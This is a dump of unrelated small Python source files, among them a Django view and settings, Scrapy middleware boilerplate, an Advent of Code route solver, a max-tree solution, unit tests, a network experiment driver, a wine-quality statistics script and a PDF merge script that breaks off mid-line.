    """Serve the five most recent articles as a JPEG file download.

    NOTE(review): the queryset itself is passed as the response body, so
    the payload is the iterated Articles' string forms — presumably that
    is the intent; confirm against the Article model.
    """
    article_list = Article.objects.order_by('-publ_date')[:5]
    # Fixed MIME type: 'application/jpeg' is not a registered media type;
    # the correct type for JPEG content served as foo.jpg is 'image/jpeg'.
    response = HttpResponse(article_list, content_type='image/jpeg')
    response['Content-Disposition'] = 'attachment; filename="foo.jpg"'
    return response
|
[
"shrykulk.rk85@gmail.com"
] |
shrykulk.rk85@gmail.com
|
349a8a44db4d2c7ab13dd0914b926e0c6fc0592d
|
1e0f1a8d67534a5ebd17a73b816ae7f1f1e32a38
|
/Primer_1.py
|
33ec5851505902fce5ee8b8ec7a765db6a9bbe5e
|
[
"MIT"
] |
permissive
|
IsSveshuD/lab_6
|
616fb2c1a01a04d290f05fd2f761c23ba23eed13
|
017e48290f6215503cf90171fb4548e114bea8e6
|
refs/heads/main
| 2023-05-05T17:28:40.450446
| 2021-05-28T00:23:04
| 2021-05-28T00:23:04
| 371,535,936
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 514
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
if __name__ == '__main__':
    # Read the list as one line of space-separated integers.
    A = list(map(int, input().split()))

    # Validate the list size: exactly 10 elements are expected.
    if len(A) != 10:
        # Runtime message is user-facing (Russian: "wrong list size").
        print("Неверный размер списка", file=sys.stderr)
        exit(1)

    # Compute the required sum: elements with absolute value below 5.
    s = 0
    for item in A:
        if abs(item) < 5:
            s += item
    print(s)
|
[
"ivan.ivan.lysenko@gmail.com"
] |
ivan.ivan.lysenko@gmail.com
|
4e05ce6b8464036952afc2136cc59c984053fdd8
|
6d32daf2b1bb339223c6eefeb94e1349f9499e36
|
/cvedetail/cvedetail/middlewares.py
|
2523a140f2d69120cae43c57d2e8ba96dda9e4a6
|
[
"MIT"
] |
permissive
|
bushubeke/systemic-vulnerability-risk-assessment
|
1b8b215abe9fd59abe04f8d550d86b578d223c1b
|
6bc35fb6666b4bc717e6c86f5383e6fd497196e6
|
refs/heads/main
| 2023-08-25T00:37:21.252033
| 2021-10-25T14:45:35
| 2021-10-25T14:45:35
| 407,853,856
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,654
|
py
|
# Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
# useful for handling different item types with a single interface
from itemadapter import is_item, ItemAdapter
class CvedetailSpiderMiddleware:
    """Scrapy spider middleware (generated boilerplate): hooks into the
    responses and results that flow between the engine and the spider.
    All hooks currently pass data through unchanged."""
    # Not all methods need to be defined. If a method is not defined,
    # scrapy acts as if the spider middleware does not modify the
    # passed objects.

    @classmethod
    def from_crawler(cls, crawler):
        # This method is used by Scrapy to create your spiders.
        s = cls()
        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
        return s

    def process_spider_input(self, response, spider):
        # Called for each response that goes through the spider
        # middleware and into the spider.

        # Should return None or raise an exception.
        return None

    def process_spider_output(self, response, result, spider):
        # Called with the results returned from the Spider, after
        # it has processed the response.

        # Must return an iterable of Request, or item objects.
        for i in result:
            yield i

    def process_spider_exception(self, response, exception, spider):
        # Called when a spider or process_spider_input() method
        # (from other spider middleware) raises an exception.

        # Should return either None or an iterable of Request or item objects.
        pass

    def process_start_requests(self, start_requests, spider):
        # Called with the start requests of the spider, and works
        # similarly to the process_spider_output() method, except
        # that it doesn’t have a response associated.

        # Must return only requests (not items).
        for r in start_requests:
            yield r

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
class CvedetailDownloaderMiddleware:
    """Scrapy downloader middleware (generated boilerplate): hooks into
    requests before download and responses after download. All hooks
    currently pass data through unchanged."""
    # Not all methods need to be defined. If a method is not defined,
    # scrapy acts as if the downloader middleware does not modify the
    # passed objects.

    @classmethod
    def from_crawler(cls, crawler):
        # This method is used by Scrapy to create your spiders.
        s = cls()
        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
        return s

    def process_request(self, request, spider):
        # Called for each request that goes through the downloader
        # middleware.

        # Must either:
        # - return None: continue processing this request
        # - or return a Response object
        # - or return a Request object
        # - or raise IgnoreRequest: process_exception() methods of
        #   installed downloader middleware will be called
        return None

    def process_response(self, request, response, spider):
        # Called with the response returned from the downloader.

        # Must either;
        # - return a Response object
        # - return a Request object
        # - or raise IgnoreRequest
        return response

    def process_exception(self, request, exception, spider):
        # Called when a download handler or a process_request()
        # (from other downloader middleware) raises an exception.

        # Must either:
        # - return None: continue processing this exception
        # - return a Response object: stops process_exception() chain
        # - return a Request object: stops process_exception() chain
        pass

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
|
[
"beimdegefu@gmail.com"
] |
beimdegefu@gmail.com
|
0472d9609808fd374cdaf024935ffc7c22584d1b
|
683876019cad0b0d562ac7f9da8c679cb310cfb2
|
/2015/day09/part1.py
|
2c1ecb0a1661747d18c537bf6bbde9d5c92c7f98
|
[] |
no_license
|
CoachEd/advent-of-code
|
d028bc8c21235361ad31ea55922625adf743b5c8
|
10850d5d477c0946ef73756bfeb3a6db241cc4b2
|
refs/heads/master
| 2023-05-11T05:20:26.951224
| 2023-05-09T18:54:16
| 2023-05-09T18:54:16
| 160,375,311
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,200
|
py
|
import sys
import time
import itertools
# Advent of Code 2015 day 9 part 1: shortest route visiting all cities
# exactly once (brute force over all permutations of the 8 cities).
start_secs = time.time()
print()

# City name -> index into the distance matrix.
d=dict()
d['AlphaCentauri'] = 0
d['Snowdin'] = 1
d['Tambi'] = 2
d['Faerun'] = 3
d['Norrath'] = 4
d['Straylight'] = 5
d['Tristram'] = 6
d['Arbre'] = 7
cities = ['AlphaCentauri','Snowdin','Tambi','Faerun','Norrath','Straylight','Tristram','Arbre']
# All possible visiting orders (8! = 40320 permutations).
routes=list(itertools.permutations(cities))
l=[]
# 8x8 symmetric distance matrix; 0 means "no direct route".
darr=[ [ 0 for c in range(8)] for r in range(8) ]
# NOTE(review): the file handle is never closed — consider `with open(...)`.
my_file = open("inp.txt", "r")
lines = my_file.readlines()
for line in lines:
    l.append(line.strip())
# Parse lines of the form "CityA to CityB = 123" into the matrix.
for s in l:
    arr = s.split('=')
    arr2 = arr[0].strip().split()
    dist=int(arr[1].strip())
    r=d[arr2[0]]
    c=d[arr2[2]]
    darr[r][c] = dist
    darr[c][r] = dist
# Try every route; keep the minimum total distance over complete routes.
mind = sys.maxsize
for r in routes:
    newd=0
    good = True
    for i in range(0,len(r)-1):
        c1=r[i]
        c2=r[i+1]
        row=d[c1]
        col=d[c2]
        if darr[row][col] == 0:
            # Missing leg: this permutation is not a valid route.
            good = False
            #print('no route from ' + c1 + ' to ' + c2)
            break
        newd = newd + darr[row][col]
    if good and newd < mind:
        mind = newd
print('part 1: '+str(mind))
#316 too high
print()
end_secs = time.time()
print(str(end_secs-start_secs))
|
[
"CoachEd@gmail.com"
] |
CoachEd@gmail.com
|
518a716768449feb3c7d3f19e8523613010117ac
|
00cd46c5722fbb4623d8cefc33bbce6e4c6bf970
|
/Stack/126.Max Tree/Solution_DFS.py
|
591fc46cebdc054d2df49542057bf05c3bed7232
|
[
"MIT"
] |
permissive
|
jxhangithub/lintcode
|
9126d0d951cdc69cd5f061799313f1a96ffe5ab8
|
afd79d790d0a7495d75e6650f80adaa99bd0ff07
|
refs/heads/master
| 2022-04-02T22:02:57.515169
| 2020-02-26T21:32:02
| 2020-02-26T21:32:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 867
|
py
|
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
    """
    @param A: Given an integer array with no duplicates.
    @return: The root of max tree.
    """
    def maxTree(self, A):
        """Build the max tree of A: the root holds the maximum element,
        and the left/right subtrees are the max trees of the sub-arrays
        on either side of it. Returns None for an empty/None input."""
        if not A:
            return None
        return self._findMaxTree(0, len(A) - 1, A)

    def _findMaxTree(self, start, end, A):
        # Recursively build the max tree for A[start:end + 1].
        if start > end:
            return None
        if start == end:
            return TreeNode(A[start])
        # Locate the maximum with a single index scan. The original
        # sliced A twice (once for max(), once for .index()), copying the
        # sub-array and scanning it three times per recursion level.
        maxValIdx = start
        for i in range(start + 1, end + 1):
            if A[i] > A[maxValIdx]:
                maxValIdx = i
        root = TreeNode(A[maxValIdx])
        root.left = self._findMaxTree(start, maxValIdx - 1, A)
        root.right = self._findMaxTree(maxValIdx + 1, end, A)
        return root
|
[
"32248549+Zhenye-Na@users.noreply.github.com"
] |
32248549+Zhenye-Na@users.noreply.github.com
|
a4fc322d49825ff1aeb43123352e24129e27d991
|
2fa28734d411aadbbe8ff7113bc5126e2f8a1ab9
|
/observation/tests/test_reducing.py
|
53dc3e44923e83e5220db61f8b2e69735d02e961
|
[
"MIT"
] |
permissive
|
pslustig/observation
|
9de8c55362a2f6a6c5b8c0ce8263646fa7369b2b
|
fd6356165ab66de72e1a3d0ba259eb56723afda3
|
refs/heads/master
| 2020-04-11T03:33:05.033286
| 2019-01-14T17:23:43
| 2019-01-14T17:23:43
| 161,481,637
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 264
|
py
|
import observation as obs
def test_band_from_filename():
    # The band letter is encoded just before the extension ("...-U.fits").
    name = 'gfvvewiv-U.fits'
    band = obs.reducing.band_from_filename(name)
    assert band == 'U'


def test_last_char_in_str():
    # NOTE(review): presumably returns the index of the last occurrence
    # of the character in the string — confirm against
    # observation.reducing.last_char_in_str.
    name = '--'
    assert obs.reducing.last_char_in_str(name, '-') == 1
|
[
"peter.lustig@physik.lmu.de"
] |
peter.lustig@physik.lmu.de
|
a475fe591275d1a60bdbce9c5d91fe11439c33ac
|
c0fba717fe308c732be069dbae4fdec7f1d0f21b
|
/run_ct_exp.py
|
6a869b8a4f84e7a2765c0573a4e5f74f57a33aa8
|
[] |
no_license
|
sibanez12/convergenceTime_exps
|
0bd94edc421af9e1bbc8d3da69ae7af19383f316
|
c079a5c32ba9cfff90dbb244b1eb23b0b6fd9aad
|
refs/heads/master
| 2021-01-13T15:27:32.590089
| 2017-05-10T01:30:42
| 2017-05-10T01:30:42
| 79,969,019
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,256
|
py
|
#!/usr/bin/env python
"""
This script runs the convergence time hardware experiments for
TCP and PERC.
The input is a flows.csv that contains entries with the format:
src_ip, dst_ip
Each entry in the flows.csv indicates one flow in the experiment.
This script performs the following functions:
1.) Detemines workload from flows.csv
2.) Runs rate monitoring service on each machine
3.) Distributes global time to start workload and starts workload
4.) After experiment, copies all log files to single location
5.) Computes correct flow rates for given topology and workload
6.) Analyzes log files to determine convergence time of each flow
7.) Reports results
Specifically for for the TCP experiment:
1.) Loads the tcp_probe kernel module on each machine
- directs the output to a tcp_probe.log file
2.) Starts an iperf server on each machine that will receive a flow
3.) Determines the global time (Tstart) that all of the iperf
clients should be started and distributes that time to each
machine.
4.) Tells Tstart to each source machine which then runs a thread that
sleeps until Tstart and then runs iperf.
5.) Experiment ends after all iperf clients finish.
6.) Copies all of the log files to a single location
7.) Computes the correct rates for each flow using Lavanya's
convergence time simulator tool
8.) Analyzes the tcp_probe.log files to determine the convergence time
of each flow
9.) Reports results
"""
import argparse
from workload import Workload
from ct_experiment_iperf import CT_Experiment
def main():
    """Parse the flows file, build the workload, run the convergence-time
    experiment and report the results (see the module docstring)."""
    parser = argparse.ArgumentParser()
    parser.add_argument('flowsFile', type=str, help="the txt file that contains the flows to run in the experiment")
    args = parser.parse_args()

    # Determine the workload (the src/dst flow pairs) from the flows file.
    workload = Workload(args.flowsFile)

    # starts the rate monitor on each host
    # starts iperf server on each destination machine
    exp = CT_Experiment(workload)

    # get the global start time, distributed to each of the
    # required hosts, and run the experiment
    exp.runExperiment()

    # copy all log files to a single location, parse the
    # results to determine the convergence times
    results = exp.getResults()
    exp.reportResults(results)

if __name__ == "__main__":
    main()
|
[
"sibanez@g.hmc.edu"
] |
sibanez@g.hmc.edu
|
ffbc4a827ac30bdf6603e580a2d84de62b02cbd8
|
b77ad03480bc81b18e350b51cbe4444a9fec7337
|
/settings.py
|
57bfb869d2b4bc04c7cc13d2342e4dbd200aafde
|
[] |
no_license
|
sandin/gorder
|
bf796de855deea782963b96269854633e0c67694
|
ad02405a837041834807fef747bb401bb4a82215
|
refs/heads/master
| 2021-01-01T20:01:22.288264
| 2011-12-04T13:34:27
| 2011-12-04T13:34:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,295
|
py
|
# Django settings for gorder project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('lds', 'lds2012@gmail.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'orders.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
# Fixed: language identifiers are language-REGION, so Simplified Chinese
# is 'zh-cn' — the original 'cn-zh' is not a valid identifier.
LANGUAGE_CODE = 'zh-cn'  # was 'cn-zh'; Django default: 'en-us'

SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
'static',
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '2-^_25i3wxb4laa@gtw9&44q#14$ydb!c2$a@y)c%4h12@678$'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.middleware.csrf.CsrfResponseMiddleware',#
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'gorder.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
'templates',
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
'django.contrib.admindocs',
'gorder.order',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
[
"lds2012@gmail.com"
] |
lds2012@gmail.com
|
aff49cb5a5763b1535e50355ec3ecf7c18264129
|
280b630786effa123cbf6a47b9e39504b2b5125c
|
/RentItProject/urls.py
|
5606d8ad368680987a6d658428ac1f52ada2ee49
|
[] |
no_license
|
prashantsarvi/Rent-It
|
a8a226f916272b5597b6adc564965e8489203cb8
|
3bbc8607e6fcee5c0932c394184e62e644d4d461
|
refs/heads/master
| 2023-04-19T13:31:00.062111
| 2021-05-06T19:23:26
| 2021-05-06T19:23:26
| 365,012,039
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 827
|
py
|
"""RentItProject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('', include('RentItApp.urls')),
path('admin/', admin.site.urls),
]
|
[
"pr486824@dal.ca"
] |
pr486824@dal.ca
|
90cb4cd25ed3faf8b8f6baadbc1e1813a83e2bc1
|
e151179c85055772136812611e0c1411efc50196
|
/statistics/wine_quality.py
|
63fd38b5d18281de6469efc00a28e4954e6db45e
|
[] |
no_license
|
nutllwhy/AnalyticsWithPython
|
82f3f067da71f56e32934f127539493193402719
|
97e90c7104e7fd0af3c1d6e388ef05208a1337c9
|
refs/heads/master
| 2020-03-08T16:01:45.528987
| 2018-09-15T13:55:28
| 2018-09-15T13:55:28
| 128,228,248
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,552
|
py
|
#!/usr/bin/env python3
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import statsmodels.api as sm
import statsmodels.formula.api as smf
from statsmodels.formula.api import ols, glm
# 将数据集读入到pandas数据框中
wine = pd.read_csv('winequality-both.csv', sep=',', header=0)
wine.columns = wine.columns.str.replace(' ', '_')
print(wine.head())
# 显示所有变量的描述性统计量
print(wine.describe())
# 找出唯一值
print(sorted(wine.quality.unique()))
# 计算值的频率
print(wine.quality.value_counts())
# 按照葡萄酒类型显示质量的描述性统计量
print(wine.groupby('type')[['quality']].describe().unstack('type'))
# 按照葡萄酒类型显示质量的特定分位数值
print(wine.groupby('type')[['quality']].quantile([0.25, 0.75]).unstack('type'))
# 按照葡萄酒类型查看质量分布
red_wine = wine.loc[wine['type']=='red', 'quality']
white_wine = wine.loc[wine['type']=='white', 'quality']
sns.set_style("dark")
print(sns.distplot(red_wine, norm_hist=True, kde=False, color="red", label="Red wine"))
print(sns.distplot(white_wine, norm_hist=True,kde=False, color="white", label="White wine"))
sns.axlabel("Quality Score", "Density")
plt.title("Distribution of Quality by Wine Type")
plt.legend()
plt.show()
# 检验红葡萄酒和白葡萄酒的平均质量是否有所不同
print(wine.groupby(['type'])[['quality']].agg(['std']))
tstat, pvalue, df = sm.stats.ttest_ind(red_wine, white_wine)
print('tstat: %.3f pvalue: %.4f' % (tstat, pvalue))
|
[
"linli0301@hotmail.com"
] |
linli0301@hotmail.com
|
ea8962ba60699d46c6b69a51c50e08e598b86af8
|
c8763aa1d1c2d7c3b965b34d8194487d23b428ed
|
/examples/t4.py
|
b8b9c1e255f4a2f4248f2225b8326fdf6ba9535b
|
[] |
no_license
|
thiagodeschamps/numpy-examples
|
67b260c7fac9d9bf78e296180adabfea75570a25
|
8c7a6f943dcb313ac2fda315de50108af24e5e39
|
refs/heads/master
| 2020-04-24T02:21:13.160740
| 2019-02-20T08:55:06
| 2019-02-20T08:55:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 315
|
py
|
import numpy as np
# matrix in normal python
L = [[1,2],[3,4]]
# arrays in numpy
M = np.array([[1,2],[3,4]])
# ways to acces the elements
print(M[0][0]) # 1
# OR
print(M[0,0]) # 1
# Matrix in numpy
M2 = np.matrix([[1,2], [3,4]])
# transforming matrix to array
A = np.array(M2)
# transpose
print(A.T)
|
[
"thiago.quantic@gmail.com"
] |
thiago.quantic@gmail.com
|
13256a1305bc92d889889c80eb8f95d586c9105a
|
927ef3729007145f50b16d8c124311ef04e62e7b
|
/groups/audio/aic/files.spec
|
399b44a6d09ea978c33f908667c46eba4c91827b
|
[
"Apache-2.0"
] |
permissive
|
projectceladon/device-androidia-mixins
|
ac08f733fee596aa9104c6be18142d4d695dbbcc
|
c2a83f0851ae39c6b502a767a0afa92647c9e73e
|
refs/heads/master
| 2023-08-31T18:47:05.779552
| 2023-07-31T04:00:23
| 2023-08-01T18:57:08
| 127,978,152
| 15
| 675
|
NOASSERTION
| 2023-09-14T15:05:51
| 2018-04-03T22:58:00
|
Makefile
|
UTF-8
|
Python
| false
| false
| 27
|
spec
|
[devicefiles]
audiopolicy:
|
[
"41093903+sysopenci@users.noreply.github.com"
] |
41093903+sysopenci@users.noreply.github.com
|
bc1df76fecb356463637a6a45c1d72b1bf9d2477
|
b1dac3171f845fa5294064492ba511171581ea00
|
/backend/tests/test_material.py
|
fe116b0a93afd9dc31a2265ea0cb25576fd95e95
|
[] |
no_license
|
CPBaja/Parts-Management
|
9980753143d961d97a53778c171370a7ebec5084
|
8e36ea0e2517cc3e849a9c3e72a295fad5a128b7
|
refs/heads/main
| 2023-05-08T07:39:59.830050
| 2021-06-02T07:16:36
| 2021-06-02T07:16:36
| 360,948,554
| 0
| 0
| null | 2021-06-02T06:59:18
| 2021-04-23T16:44:30
| null |
UTF-8
|
Python
| false
| false
| 139
|
py
|
import material
def test_material():
material.Material()
material.Aluminum("")
material.CarbonFiber()
material.Steel("")
|
[
"rahulxgoyal@gmail.com"
] |
rahulxgoyal@gmail.com
|
9f5ac27e9159066b298faf38dc4dca9399804529
|
1d38edc479e5804f157abe503e8a2b2f3880641b
|
/Ex010.py
|
a1987748151cd7df31922e953a3f681ce43a69dc
|
[
"MIT"
] |
permissive
|
GabrielSilva2y3d/Curso-em-video-python-exercicios
|
947d5425aaef5ed91d54fceae9826569d6f0a67f
|
1098ccb3f8c21b411e6b6e6dc1c9bb339e80b785
|
refs/heads/main
| 2023-03-04T18:13:06.871965
| 2021-02-20T21:23:02
| 2021-02-20T21:23:02
| 326,793,645
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
print('Conversor de moedas')
reais = float(input('Digite um valor em reais: R$'))
dolar = reais/5.27
print(f'R${reais} equivale a US${dolar:.2f}')
|
[
"74156876+GabrielSilva2y3d@users.noreply.github.com"
] |
74156876+GabrielSilva2y3d@users.noreply.github.com
|
10f8a390e3b42d25c9103a522c1977c4edda5872
|
d50b5f399d092556e1836ceac57a466c74dc9cd0
|
/lantern/relational_database/homework.py
|
599bb16d10e31d6723e10e93cc09e91fe81f1e05
|
[] |
no_license
|
maxiksonik/green_lantern
|
1edf787fc7f29c27f22467155fedd88014b6e238
|
80d6ff8676c5594849940e557a72958dcd01bda2
|
refs/heads/master
| 2021-02-28T17:50:52.983208
| 2020-06-23T14:45:55
| 2020-06-23T14:45:55
| 245,719,512
| 1
| 0
| null | 2020-03-21T20:08:40
| 2020-03-07T23:13:00
|
Python
|
UTF-8
|
Python
| false
| false
| 3,331
|
py
|
from typing import List
def task_1_add_new_record_to_db(con) -> None:
"""
Add a record for a new customer from Singapore
{
'customer_name': 'Thomas',
'contactname': 'David',
'address': 'Some Address',
'city': 'London',
'postalcode': '774',
'country': 'Singapore',
}
Args:
con: psycopg connection
Returns: 92 records
"""
pass
def task_2_list_all_customers(cur) -> list:
"""
Get all records from table Customers
Args:
cur: psycopg cursor
Returns: 91 records
"""
pass
def task_3_list_customers_in_germany(cur) -> list:
"""
List the customers in Germany
Args:
cur: psycopg cursor
Returns: 11 records
"""
pass
def task_4_update_customer(con):
"""
Update first customer's name (Set customername equal to 'Johnny Depp')
Args:
cur: psycopg cursor
Returns: 91 records with updated customer
"""
pass
def task_5_delete_the_last_customer(con) -> None:
"""
Delete the last customer
Args:
con: psycopg connection
"""
pass
def task_6_list_all_supplier_countries(cur) -> list:
"""
List all supplier countries
Args:
cur: psycopg cursor
Returns: 29 records
"""
pass
def task_7_list_supplier_countries_in_desc_order(cur) -> list:
"""
List all supplier countries in descending order
Args:
cur: psycopg cursor
Returns: 29 records in descending order
"""
pass
def task_8_count_customers_by_city(cur):
"""
List the number of customers in each city
Args:
cur: psycopg cursor
Returns: 69 records in descending order
"""
pass
def task_9_count_customers_by_country_with_than_10_customers(cur):
"""
List the number of customers in each country. Only include countries with more than 10 customers.
Args:
cur: psycopg cursor
Returns: 3 records
"""
pass
def task_10_list_first_10_customers(cur):
"""
List first 10 customers from the table
Results: 10 records
"""
pass
def task_11_list_customers_starting_from_11th(cur):
"""
List all customers starting from 11th record
Args:
cur: psycopg cursor
Returns: 11 records
"""
pass
def task_12_list_suppliers_from_specified_countries(cur):
"""
List all suppliers from the USA, UK, OR Japan
Args:
cur: psycopg cursor
Returns: 8 records
"""
pass
def task_13_list_products_from_sweden_suppliers(cur):
"""
List products with suppliers from Sweden.
Args:
cur: psycopg cursor
Returns: 3 records
"""
pass
def task_14_list_products_with_supplier_information(cur):
"""
List all products with supplier information
Args:
cur: psycopg cursor
Returns: 77 records
"""
pass
def task_15_list_customers_with_any_order_or_not(cur):
"""
List all customers, whether they placed any order or not.
Args:
cur: psycopg cursor
Returns: 213 records
"""
pass
def task_16_match_all_customers_and_suppliers_by_country(cur):
"""
Match all customers and suppliers by country
Args:
cur: psycopg cursor
Returns: 194 records
"""
pass
|
[
"illia.sukonnik@made.com"
] |
illia.sukonnik@made.com
|
d669a80e3039438d012723e0ca8e3ac15b34ead2
|
bcc3655afcba1ba7b91afae39590fe4a10dcf88f
|
/utility.py
|
c3cf58db314c3258cdb191d908c063105767429d
|
[
"Apache-2.0"
] |
permissive
|
jcFisk/SE-Team
|
b1553e05052bf0debdde7a528ed8e63dbd79e8b2
|
a732da50486cf0e776d08e96377547e1dfac0b0a
|
refs/heads/master
| 2016-09-06T01:57:16.494366
| 2014-04-24T21:02:23
| 2014-04-24T21:02:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 470
|
py
|
import re
def email_is_valid(email):
if not re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+").match(email):
return False
if not len(re.findall('[a-zA-Z]',email[-1]))>0:
return False
if '@.' in email:
return False
return True
def dictfetchall(cursor, num_rows_to_fetch=1000000000):
"""Returns all rows from a cursor as a dict"""
desc = cursor.description
return [
dict(zip([col[0] for col in desc], row))
for row in cursor.fetchmany(size=num_rows_to_fetch)
]
|
[
"jcfisk@email.uark.edu"
] |
jcfisk@email.uark.edu
|
7e6edf8627af377af964f85386a2907641ae9030
|
7a257480a78598af017a6220ea2b4bad25882630
|
/bin/merge6.py
|
61761914e657357a9a8367038cee245f86d5ae2a
|
[] |
no_license
|
nanchenchen/sims_maf
|
e619b5feaff5f0134518235d78bb383806afb4f6
|
2b0faebd60fb4387366954d3531ac4d9df8c6fc4
|
refs/heads/master
| 2021-01-22T11:20:17.606277
| 2015-04-30T03:29:31
| 2015-04-30T03:29:31
| 34,808,757
| 0
| 0
| null | 2015-04-29T17:46:10
| 2015-04-29T17:46:10
| null |
UTF-8
|
Python
| false
| false
| 1,682
|
py
|
#! /usr/bin/env python
import argparse
import subprocess
if __name__=="__main__":
"""
Merge the u,g,r,i,z,y plots into a 3x2 grid.
Requires pdfjam: http://www2.warwick.ac.uk/fac/sci/statistics/staff/academic-research/firth/software/pdfjam
Can be used with .pdf or .png files, but the output will always be a pdf
examples:
merge6.py ops1_1122_Median_fiveSigmaDepth_i_band_WFD_HEAL_SkyMap.pdf
merge6.py thumb.ops1_1122_Median_fiveSigmaDepth_u_band_all_props_HEAL_SkyMap.png
"""
parser = argparse.ArgumentParser(description="Merge 6 plots into a single pdf")
parser.add_argument("fileBase", type=str, help="filename of one of the files to merge.")
parser.add_argument("-O", "--outfile", type=str, default=None, help="Output filename")
args = parser.parse_args()
fileBase = args.fileBase
if '/' in fileBase:
fileBase = fileBase.split('/')
path = fileBase[:-1]
path = '/'.join(path)+'/'
fileBase = fileBase[-1]
else:
path=''
# Make a list of the 6 files:
filters = ['u','g','r','i','z','y']
for f in filters:
if '_'+f+'_' in fileBase:
fileBase = fileBase.split('_'+f+'_')
fileList = [ path+fileBase[0]+'_'+f+'_'+fileBase[1] for f in filters]
if args.outfile is None:
outfile = fileBase[0]+'_6_'+fileBase[1]
else:
outfile = args.outfile
# can only output pdf files
if outfile[-3:] == 'png':
